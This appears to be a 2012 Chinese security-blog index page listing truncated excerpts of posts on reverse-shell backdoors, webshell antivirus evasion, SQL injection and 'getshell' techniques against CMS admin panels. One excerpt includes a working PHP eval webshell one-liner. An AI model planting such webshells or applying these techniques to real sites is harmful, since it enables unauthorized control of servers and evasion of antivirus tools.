几条好用的WIN批处理
- 2012-10-04
- 日志
批处理读文件 for /f "delims= tokens=1*" %%a in (D:\Desktop\result.txt) do echo %%a 1 ...
InsomniaShell ASPX版的 shell后门创建工具
- 2012-09-14
- 周边
InsomniaShell (失眠后门),是一个用于渗透测试的工具,当服务器支持aspx,并且为SYSTEM 或者 Administrator 权限 ,就可以利用其获得一个反弹shell ,或者一...
php webshell免杀工具
- 2012-08-23
- 周边
这不是webshell,只是个webshell免杀工具 切勿当初webshell使用 仅限免杀phpwebshell 该工具运行在 cli 模式! PHP <?php /...
phpcmsV9后台拿shell
- 2012-08-22
- Vulndb
search目录下面的index.html右侧的编辑 修改其模版为: PHP <?php $shell = '<?php @eval($_POST[cmd]);?>' ; ...
Python版phpcmsV9自动写shell
- 2012-08-22
- Vulndb
注意:本程序具有攻击性,请勿用作非法用途,否则于本作者无关! 最近一直在学习python相关内容就顺手写个工具以作练习,上代码: PHP ...
mysql备份一句话
- 2012-08-22
- 周边
很多时候我们拿到了PHPMYADMIN,现在如何利用PHPMYADMIN拿到WEBSHELL呢。有些朋友还不清楚。这里简要说一下: 利用PHPMYADMIN连上后,进入当前站点的数据库,...
良精企业通用建站系统若干漏洞
- 2012-06-08
- Vulndb
一,SQl注入漏洞 1,典型的Cookies注入 漏洞文件:Shownews.asp 问题代码: ASP id=cstr(request(“id”)) Set rsnews=Server.Cre...
DVBBS 8.2.0 后台 GET SHELL
- 2012-06-05
- Vulndb
和添加PHP一样,如何上传的php不能解析,或则管理员将PHP禁用的另外一则方法 前提:支持ASPX,因为ASPX不能上传,我们需要上传的是ASHX 源码: ...
phpmywind xss & csrf getShell 拿下官网
审计代码吧,首先看后台能不能getShell 直接编辑 php文件 写入一句话 所有Sql 语句全部经过一个非常变态的函数 80sec 写的,绕不鸟,群里面叫了几句,无果, 压力肯大 Sql injection不可能了,看到 message.php ...